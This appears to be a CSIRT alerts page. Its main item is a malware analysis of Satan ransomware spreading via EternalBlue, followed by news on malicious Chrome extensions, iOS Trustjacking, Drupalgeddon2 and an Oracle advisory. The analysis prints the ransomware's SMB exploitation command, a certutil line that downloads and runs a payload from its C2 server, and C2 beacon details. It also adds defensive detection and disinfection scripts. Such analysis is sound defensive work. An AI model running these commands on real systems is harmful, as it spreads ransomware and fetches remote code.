Alerts

Satan ransomware itself has been around since January 2017. In this post we analyze the new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network and consequently encrypt files.


Analysis

First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.

The file is packed with PECompact 2, and is therefore only 30KB in filesize.

Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.

“sts.exe” acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:

Figure 1: Download and extract two new files


Both files will be downloaded from 198.55.107[.]149, using a custom User-Agent "RookIE/1.0", which is a rather unique User-Agent.

  • ms.exe has password: iamsatancryptor
  • client.exe has password: abcdefghijklmn

It appears the Satan ransomware developers showcase some sense of humor by using the password “iamsatancryptor”.

Once the user has executed “sts.exe”, they will get the following UAC prompt, if enabled:

Figure 2: UAC prompt


Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and holds the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.

Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed – this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.

Figure 3: End of setup screen


ms.exe (770ddc649b8784989eed4cee10e8aa04), on the other hand, will drop and load the EternalBlue exploit and start scanning for vulnerable hosts. Required files are dropped in the C:\ProgramData folder, as seen in Figure 3. Note that it uses a publicly available implementation of the exploit – it does not appear to use its own.

The infection of other machines on the network will be achieved with the following command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp

We can then see an attempt to spread the ransomware to other machines in the same network:

Figure 4 – Spreading attempt over SMB, port 445


down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be injected into rundll32.exe using DoublePulsar, and executes the following command:

cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe

This plants sts.exe on other machines in the network, where it is consequently executed.

Satan ransomware itself is contained in Client.exe and will be dropped to C:\Cryptor.exe. This payload is also packed with PECompact 2. As usual, it terminates any database-related services and processes, so that it can also encrypt files that may be in use by another process.

Figure 5 – Database-related processes


What's new in this version of Satan is that the exclusion list has changed slightly – it will not encrypt files with the following words in their path:

windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user

This exclusion list is reminiscent of Iron ransomware.

Satan will, after encryption, automatically open the following ransom note, C:\_How_to_decrypt_files.txt:

Figure 6 – Ransom note


The note is, as usual, in English, Chinese and Korean, and demands that the user pay 0.3 BTC. Satan prepends its email address, satan_pro@mail.ru, to filenames and appends the extension .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan


BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo 

Email: satan_pro@mail.ru

Note: _How_to_decrypt_files.txt

It appears one person has already paid 0.2 BTC:
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo

Satan creates a unique mutex, SATANAPP, so the ransomware won't run twice. It also generates a unique hardware ID and sends this to the C2 server:

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Connection: Keep-Alive
User-Agent: Winnet Client
Host: 198.55.107.149
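The indicators quoted in this post (the C2 host and User-Agents, the hardware-ID beacon above, and the certutil command executed by down64.dll) can be turned into simple matching rules for proxy logs and process command lines. The following is an added example written for this page and is not code from the original analysis: the hosts, User-Agents, URL paths and the certutil command are taken from the post, while the sample records, the hit labels and the alphabet accepted for the beacon's code value (shown on the page only as a placeholder) are constructed assumptions. It also covers the November 2017 download paths listed further down.

```python
"""Added example (not from the original analysis): match the Satan network
and command-line indicators quoted in this post against raw HTTP requests
and process command lines. Hosts, User-Agents, URL paths and the certutil
command come from the page; the sample records and hit labels are constructed."""
import re
from typing import Dict, List, Tuple

# C2 / download hosts and User-Agents quoted in the analysis.
C2_HOSTS = {"198.55.107.149", "122.114.9.220"}
C2_USER_AGENTS = {"RookIE/1.0", "Winnet Client"}
# Payload paths quoted in the analysis (current and November 2017 campaigns).
PAYLOAD_PATHS = {"/cab/sts.exe", "/data/client.exe", "/data/ms.exe", "/data/winlog.exe"}
# Hardware-ID beacon; the post shows the code only as a placeholder, so the
# alphabet accepted here is an assumption.
TOKEN_BEACON = re.compile(r"^/data/token\.php\?status=ST&code=[A-Za-z0-9]+$")
# certutil used as a downloader, as in the command executed by down64.dll.
CERTUTIL_FETCH = re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*\bhttps?://", re.IGNORECASE)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into method, request target and lower-cased headers."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify_request(raw: str) -> List[str]:
    """Indicator labels matched by one raw HTTP request (empty list if none)."""
    _method, target, headers = parse_request(raw)
    hits: List[str] = []
    if headers.get("host", "").split(":")[0] in C2_HOSTS:
        hits.append("known-c2-host")
    if headers.get("user-agent") in C2_USER_AGENTS:
        hits.append("satan-user-agent")
    if TOKEN_BEACON.match(target):
        hits.append("satan-hwid-beacon")
    if target.split("?", 1)[0] in PAYLOAD_PATHS:
        hits.append("satan-payload-download")
    return hits


def classify_command(cmdline: str) -> List[str]:
    """Indicator labels matched by one process command line."""
    hits: List[str] = []
    if CERTUTIL_FETCH.search(cmdline):
        hits.append("certutil-download")
    if re.search(r"\bsts\.exe\b", cmdline, re.IGNORECASE):
        hits.append("satan-spreader-name")
    if re.search(r"\bdown64\.dll\b", cmdline, re.IGNORECASE):
        hits.append("eternalblue-dll-payload")
    return hits


# Constructed samples: the beacon and certutil command as quoted in the post,
# plus a benign request for contrast.
SAMPLE_BEACON = ("GET /data/token.php?status=ST&code=" + "0" * 64 + " HTTP/1.1\r\n"
                 "Connection: Keep-Alive\r\nUser-Agent: Winnet Client\r\n"
                 "Host: 198.55.107.149\r\n")
SAMPLE_FETCH = ("GET /cab/sts.exe HTTP/1.1\r\nHost: 198.55.107.149\r\n"
                "User-Agent: Example-Agent/1.0\r\n")
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n"
SAMPLE_CMD = r"cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe"

if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_FETCH, SAMPLE_BENIGN):
        print(sample.splitlines()[0], "->", classify_request(sample))
    print(SAMPLE_CMD, "->", classify_command(SAMPLE_CMD))
```

The host and User-Agent rules are the cheapest to deploy but also the first to go stale when a campaign changes infrastructure; the beacon-path and certutil rules describe behaviour rather than infrastructure and tend to survive longer.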

As mentioned at the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similarly to the one described in this post. It would fetch the following files:

  • http://122.114.9.220/data/client.exe
  • http://122.114.9.220/data/ms.exe
  • http://122.114.9.220/data/winlog.exe

According to VirusTotal, the downloader file was uploaded:

2017-11-20 18:35:17 UTC ( 5 months ago )

For additional reading, see this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.

Disinfection

You may want to verify if any of the following files or folders exist:

  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession
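The check above is easy to script. The following is an added example written for this page, not a tool from the original analysis: it takes a listing of paths (from a directory walk on a live host, or a constructed sample as here) and reports the artifact paths from the list above, the ransom note location, and any file renamed with the [satan_pro@mail.ru]<name>.satan convention described earlier. The artifact paths and naming convention come from the page; the sample listing is constructed.

```python
"""Added example (not part of the original analysis): check a file listing for
the Satan artifacts listed above and for files renamed with the
[satan_pro@mail.ru]<name>.satan convention. The artifact paths and the naming
convention come from the page; the sample listing is constructed."""
import os
import re
from typing import Dict, Iterable, List

# Artifact paths from the Disinfection list, plus the ransom note location.
SATAN_ARTIFACTS = [
    r"C:\sts.exe",
    r"C:\Cryptor.exe",
    r"C:\ProgramData\ms.exe",
    r"C:\ProgramData\client.exe",
    r"C:\Windows\Temp\KSession",
    r"C:\_How_to_decrypt_files.txt",
]

# Encrypted-file naming convention: email prepended, .satan appended.
SATAN_RENAMED = re.compile(r"^\[satan_pro@mail\.ru\].+\.satan$", re.IGNORECASE)


def _basename(path: str) -> str:
    """Last path component; handles Windows separators on any host."""
    return path.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1]


def find_artifacts(paths: Iterable[str]) -> List[str]:
    """Known artifact paths present in the listing (case-insensitive match)."""
    present = {p.lower() for p in paths}
    return [a for a in SATAN_ARTIFACTS if a.lower() in present]


def find_encrypted_files(paths: Iterable[str]) -> List[str]:
    """Paths whose file name follows the Satan rename pattern."""
    return [p for p in paths if SATAN_RENAMED.match(_basename(p))]


def assess(paths: Iterable[str]) -> Dict[str, object]:
    """Summarise artifact and encrypted-file hits for a listing of paths."""
    listing = list(paths)
    artifacts = find_artifacts(listing)
    encrypted = find_encrypted_files(listing)
    return {"artifacts": artifacts, "encrypted": encrypted,
            "infected": bool(artifacts or encrypted)}


def walk_host(roots: Iterable[str] = ("C:\\",)) -> Iterable[str]:
    """Enumerate files and directories under roots on a live Windows host."""
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                yield os.path.join(dirpath, name)


if __name__ == "__main__":
    # Constructed listing standing in for walk_host() output.
    sample = [
        r"C:\Windows\notepad.exe",
        r"C:\ProgramData\ms.exe",
        r"C:\Users\alice\Pictures\[satan_pro@mail.ru]Desert.jpg.satan",
    ]
    print(assess(sample))
```

On a live host, pass walk_host() to assess(); directories are included in the walk so that the KSession folder is reported as well as the dropped executables.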

Prevention

  • Enable UAC
  • Enable Windows Update, and install updates (especially verify that MS17-010 is installed)
  • Install an antivirus, and keep it up-to-date and running
  • Restrict, where possible, access to shares (ACLs)
  • Create backups! (and test them)

More ransomware prevention can be found here.


Conclusion

Satan is not the first ransomware to use EternalBlue (WannaCry, for example); however, the developers of Satan do appear to be continuously improving and adding features to their ransomware.

Prevention is always better than disinfection/decryption.


The information contained in this website is for general information purposes only. The information is gathered from Security Boulevard while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

A security researcher has spotted five malicious ad blocker extensions in the Google Chrome Store that had already been installed by at least 20 million users.

If you have installed any of the below-mentioned ad blocker extensions in your Chrome browser, you could have been hacked.

Unfortunately, malicious browser extensions are nothing new. They often have access to everything you do online and could allow their creators to steal any information victims enter into any website they visit, including passwords, web browsing history and credit card details.

Discovered by Andrey Meshkov, co-founder of Adguard, these five malicious extensions are copycat versions of some legitimate, well-known Ad Blockers.
Creators of these extensions also used popular keywords in their names and descriptions to rank top in the search results, increasing the possibility of getting more users to download them.
“All the extensions I’ve highlighted are simple rip-offs with a few lines of code and some analytics code added by the authors,” Meshkov says.


After Meshkov reported his findings to Google on Tuesday, the tech giant immediately removed all of the following malicious ad blocker extensions from its Chrome Store:

  • AdRemover for Google Chrome™ (10 million+ users)
  • uBlock Plus (8 million+ users)
  • [Fake] Adblock Pro (2 million+ users)
  • HD for YouTube™ (400,000+ users)
  • Webutation (30,000+ users)

Meshkov downloaded the ‘AdRemover’ extension for Chrome, and after analyzing it, he discovered that malicious code hidden inside the modified version of jQuery, a well-known JavaScript library, sends information about some websites a user visits back to a remote server.

The malicious extension then receives commands from the remote server, which are executed in the extension ‘background page’ and can change your browser’s behaviour in any way.

To avoid detection, the commands sent by the remote server are hidden inside a harmless-looking image.
“These commands are scripts which are then executed in the privileged context (extension’s background page) and can change your browser behaviour in any way,” Meshkov says.

“Basically, this is a botnet composed of browsers infected with the fake Adblock extensions,” Meshkov says. “The browser will do whatever the command center server owner orders it to do.”

The researcher also analyzed other extensions on the Chrome Store and found four more extensions using similar tactics.

Since a browser extension is granted permission to access all the web pages you visit, it can do practically anything.


Source: The Hacker News.


A new vulnerability called "iOS Trustjacking" has been discovered in iOS that allows an attacker to control a vulnerable device remotely and perform various malicious activities.

iOS Trustjacking exploits a weakness in iTunes Wi-Fi sync that enables an attacker to gain remote access without any user interaction and persistent control of the victim's device without any physical interaction.

"iTunes Wi-Fi Sync" is a useful feature that allows iOS devices to be synced with iTunes without having to connect the iOS device to the computer physically.

Previously discovered related attacks, such as juice jacking (a new computer did not require any authorisation, which allowed malware to be installed) and videojacking (an HDMI connection used to obtain a screen recording of the iOS device), required physical interaction with the user's device to perform their malicious activities.

How does this iOS Trustjacking vulnerability work

iTunes Wi-Fi sync lets a computer communicate with the device without a physical connection. To enable this feature, the user must first sync the iOS device with iTunes by connecting it to the computer with a cable; after that, syncing with the iOS device works over Wi-Fi.

When the user connects their iOS device to a new computer, they are asked whether to trust that computer or not; once the user allows it, the computer can access the iOS device via the standard iTunes APIs.


So the attacker needs to take two steps:

  • Allow the device to connect to iTunes
  • Enable iTunes Wi-Fi sync

Interestingly, enabling "iTunes Wi-Fi sync" does not require the victim's approval and can be done purely from the computer side.

An attacker can thus easily take screenshots and view or record the display remotely, and can also gain access to a lot of private information such as photos, SMS / iMessage chat history, app data, etc.

According to the researcher, these steps can be automated by malicious software. Interestingly, they do not require any additional approval from the victim and do not trigger any indication on the device that something is happening.

“To be able to view the victim’s device screen, the attacker needs to install the developer image suitable for the victim’s device iOS version; then, he can take screenshots repeatedly and view the device’s screen in near real time. Installing the developer image can be conducted over Wi-Fi and does not require regaining physical access to the device. “

Furthermore, a user should be careful while plugging an iPhone into a friend’s laptop for a quick charge or sharing selected files.

Apple provides an iTunes Wi-Fi sync feature in iOS that allows users to sync their iPhones to a computer wirelessly. To enable this feature, users have to grant one-time permission to a trusted computer (with iTunes) over a USB cable.

Once enabled, the feature allows the computer owner to secretly spy on your iPhone over the Wi-Fi network without requiring any authentication, even when your phone is no longer physically connected to that computer.

“Reading the text, the user is led to believe that this is only relevant while the device is physically connected to the computer, so assumes that disconnecting it will prevent any access to his private data,” Symantec said.

Since there is no obvious indication on the victim’s device, Symantec believes the feature could exploit the “relation of trust the victim has between his iOS device and a computer.”

Researchers suggest the following scenarios in which a TrustJacking attack can be successfully performed, especially when you trust the wrong computer:

  • Connecting your phone to a free charger at an airport, and mistakenly approving the pop-up permission message to trust the connected station.
  • A remote attacker, not on the same Wi-Fi network, can also access the iPhone data if malware has compromised the device owner's own "trusted" PC or Mac.

Moreover, the iTunes Wi-Fi sync feature could also be used to remotely install malware apps on your iPhone, as well as to download a backup and steal all your photos, SMS / iMessage chat history, and application data.


“An attacker can also use this access to the device to install malicious apps, and even replace existing apps with a modified wrapped version that looks exactly like the original app, but can spy on the user while using the app and even leverage private APIs to spy on other activities all the time,” Symantec said.

The TrustJacking attack could also allow trusted computers to watch your device’s screen in real-time by repeatedly taking remote screenshots, observing and recording your every action.


After being notified by the Symantec researchers, Apple introduced another security layer in iOS 11, asking users to enter their iPhone's passcode when pairing their iPhone with a computer.

However, Symantec says the loophole remains open, as the patch does not address the primary concern, i.e., the absence of noticeable indication or mandatory re-authentication between the user’s device and the trusted computer after a given interval of time.

“While we appreciate the mitigation that Apple has taken, we’d like to highlight that it does not address Trustjacking in a holistic manner,” Symantec’s Roy Iarchy said. “Once the user has chosen to trust the compromised computer, the rest of the exploit continues to work as described above.”

The best and simplest way to protect yourself is to ensure that no unwanted computers are trusted by your iOS device. To do this, you can clear the trusted computers list by going to Settings → General → Reset → Reset Location & Privacy.

Also, most importantly, always deny access when asked to trust a computer while charging your iOS device. Your device will still charge from the computer, without exposing your data.


Source: GBHackers and The Hacker News.


Hackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of working exploit code.

Two weeks ago, the Drupal security team discovered a highly critical remote code execution vulnerability, dubbed Drupalgeddon2, in its content management system software that could allow attackers to completely take over vulnerable websites.

To address this vulnerability, the company immediately released updated versions of Drupal CMS without releasing any technical details of the vulnerability, giving more than a million sites enough time to patch the issue.

Security researchers at Check Point and Dofinity published complete technical details about this vulnerability (CVE-2018-7600), using which, a Russian security researcher published a proof-of-concept (PoC) exploit code for Drupalgeddon2 on GitHub.

The Drupalgeddon2 vulnerability that affects all versions of Drupal from 6 to 8 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations.

According to Check Point's disclosure, the vulnerability exists due to insufficient sanitization of inputs passed via Form API (FAPI) AJAX requests.

“As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,” Check Point researchers said.

“By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.”

However, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at Sucuri, Imperva, and the SANS Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none had yet seen any reports of websites being hacked.

Site administrators still running vulnerable versions of Drupal are strongly advised to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible to avoid exploitation.

The vulnerability also affects Drupal 6, which has not been supported by the company since February 2016, but a patch for that version has nevertheless been created.


Source: The Hacker News.


CVE No: CVE-2018-2861

PUBLISHED: Apr 17 2018 12:00AM

UPDATED: Apr 18 2018 04:00AM

CVSS SCORE: 6.5

AFFECTED PRODUCT & VERSIONS: Oracle Retail Back Office 14.1.3, Oracle Retail Back Office 14.0.4, Oracle Retail Back Office 13.4.9


THREAT:

An easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Retail Back Office.

IMPACT:

Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Back Office accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Retail Back Office.

SOLUTION:

Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible. Until you apply the Critical Patch Update fixes, it may be possible to reduce the risk of successful attack by blocking network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack. Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.

IMPLEMENTATION:

Software patches and updates are available at: http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

RELATED LINKS:

  1. http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
  2. http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-3678108.html#RAPP


Source: Security Focus.